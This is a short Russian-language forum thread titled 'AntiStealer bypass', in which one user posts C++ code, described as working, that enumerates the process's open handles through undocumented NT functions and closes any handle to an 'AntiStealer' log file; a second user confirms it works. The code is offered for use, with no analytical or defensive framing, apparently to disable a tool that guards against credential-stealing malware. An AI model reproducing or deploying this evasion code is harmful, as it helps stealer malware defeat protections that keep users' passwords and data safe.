PDA

Просмотр полной версии : AntiStealer bypass

es3n1n)
27.07.2019, 19:15
ловите рофланебало байпасс(работает)


C++:






namespace
bypass
{
typedef
NTSTATUS
(
NTAPI
*
NtQuerySystemInformation_t
)
(
ULONG SystemInformationClass
,
PVOID SystemInformation
,
ULONG SystemInformationLength
,
PULONG ReturnLength
)
;
typedef
NTSTATUS
(
NTAPI
*
NtDuplicateObject_t
)
(
HANDLE SourceProcessHandle
,
HANDLE SourceHandle
,
HANDLE TargetProcessHandle
,
PHANDLE TargetHandle
,
ACCESS_MASK DesiredAccess
,
ULONG Attributes
,
ULONG Options
)
;
typedef
NTSTATUS
(
NTAPI
*
NtQueryObject_t
)
(
HANDLE ObjectHandle
,
ULONG ObjectInformationClass
,
PVOID ObjectInformation
,
ULONG ObjectInformationLength
,
PULONG ReturnLength
)
;
typedef
struct
_UNICODE_STRING
{
USHORT Length
;
USHORT MaximumLength
;
PWSTR Buffer
;
}
UNICODE_STRING
,
*
PUNICODE_STRING
;
typedef
struct
_SYSTEM_HANDLE
{
ULONG ProcessId
;
BYTE ObjectTypeNumber
;
BYTE Flags
;
USHORT Handle
;
PVOID Object
;
ACCESS_MASK GrantedAccess
;
}
SYSTEM_HANDLE
,
*
PSYSTEM_HANDLE
;
typedef
struct
_SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount
;
SYSTEM_HANDLE Handles
[
1
]
;
}
SYSTEM_HANDLE_INFORMATION
,
*
PSYSTEM_HANDLE_INFORMATION
;
typedef
enum
_POOL_TYPE
{
NonPagedPool
,
PagedPool
,
NonPagedPoolMustSucceed
,
DontUseThisType
,
NonPagedPoolCacheAligned
,
PagedPoolCacheAligned
,
NonPagedPoolCacheAlignedMustS
}
POOL_TYPE
,
*
PPOOL_TYPE
;
typedef
struct
_OBJECT_TYPE_INFORMATION
{
UNICODE_STRING Name
;
ULONG TotalNumberOfObjects
;
ULONG TotalNumberOfHandles
;
ULONG TotalPagedPoolUsage
;
ULONG TotalNonPagedPoolUsage
;
ULONG TotalNamePoolUsage
;
ULONG TotalHandleTableUsage
;
ULONG HighWaterNumberOfObjects
;
ULONG HighWaterNumberOfHandles
;
ULONG HighWaterPagedPoolUsage
;
ULONG HighWaterNonPagedPoolUsage
;
ULONG HighWaterNamePoolUsage
;
ULONG HighWaterHandleTableUsage
;
ULONG InvalidAttributes
;
GENERIC_MAPPING GenericMapping
;
ULONG ValidAccess
;
BOOLEAN SecurityRequired
;
BOOLEAN MaintainHandleCount
;
USHORT MaintainTypeList
;
POOL_TYPE PoolType
;
ULONG PagedPoolUsage
;
ULONG NonPagedPoolUsage
;
}
OBJECT_TYPE_INFORMATION
,
*
POBJECT_TYPE_INFORMATION
;
bool
activate_meme
(
)
{
char
filePath
[
MAX_PATH
]
;
SIZE_T handleInfoSize
=
0x10000
;
ULONG returnLength
;
NTSTATUS status
;
NtQuerySystemInformation_t NtQuerySystemInformation
=
reinterpret_cast

(
filter
::
get_proc_address
(
"ntdll.dll"
,
"NtQuerySystemInformation"
)
)
;
NtDuplicateObject_t NtDuplicateObject
=
reinterpret_cast

(
filter
::
get_proc_address
(
"ntdll.dll"
,
"NtDuplicateObject"
)
)
;
NtQueryObject_t NtQueryObject
=
reinterpret_cast

(
filter
::
get_proc_address
(
"ntdll.dll"
,
"NtQueryObject"
)
)
;
auto
handleInfo
=
reinterpret_cast

(
malloc
(
handleInfoSize
)
)
;
while
(
(
status
=
NtQuerySystemInformation
(
16
,
handleInfo
,
handleInfoSize
,
NULL
)
)
==
0xC0000004
)
handleInfo
=
reinterpret_cast

(
realloc
(
handleInfo
,
handleInfoSize
*=
2
)
)
;
if
(
!
NT_SUCCESS
(
status
)
)
return
false
;
for
(
int
i
=
0
;
i

HandleCount
;
i
++
)
{
HANDLE handle
=
reinterpret_cast

(
handleInfo
->
Handles
[
i
]
.
Handle
)
;
if
(
handleInfo
->
Handles
[
i
]
.
ProcessId
!=
GetCurrentProcessId
(
)
)
continue
;
auto
objectTypeInfo
=
reinterpret_cast

(
malloc
(
0x1000
)
)
;
if
(
!
NT_SUCCESS
(
NtQueryObject
(
handle
,
ObjectTypeInformation
,
objectTypeInfo
,
0x1000
,
NULL
)
)
)
{
free
(
objectTypeInfo
)
;
continue
;
}
if
(
handleInfo
->
Handles
[
i
]
.
GrantedAccess
==
0x0012019f
)
continue
;
auto
objectNameInfo
=
malloc
(
0x1000
)
;
if
(
!
NT_SUCCESS
(
NtQueryObject
(
handle
,
1
,
objectNameInfo
,
0x1000
,
&
returnLength
)
)
)
{
objectNameInfo
=
realloc
(
objectNameInfo
,
returnLength
)
;
if
(
!
NT_SUCCESS
(
NtQueryObject
(
handle
,
1
,
objectNameInfo
,
returnLength
,
NULL
)
)
)
{
free
(
objectTypeInfo
)
;
free
(
objectNameInfo
)
;
continue
;
}
}
auto
objectName
=
*
reinterpret_cast

(
objectNameInfo
)
;
if
(
objectName
.
Length
)
{
wchar_t
buff
[
1024
]
;
ZeroMemory
(
buff
,
sizeof
(
buff
)
)
;
memcpy
(
buff
,
objectName
.
Buffer
,
objectName
.
Length
)
;
*
(
wchar_t
*
)
(
buff
+
objectName
.
Length
+
2
)
=
L
'\0'
;
if
(
wcsstr
(
buff
,
L
"AntiStealer"
)
&&
(
wcsstr
(
buff
,
L
".LOG"
)
||
wcsstr
(
buff
,
L
".log"
)
)
)
// А ШТО ЖЕ ЭТО?
{
CloseHandle
(
handle
)
;
return
true
;
}
}
}
return
false
;
}
}
Lolendor
28.07.2019, 20:51
рафлан жаба, работает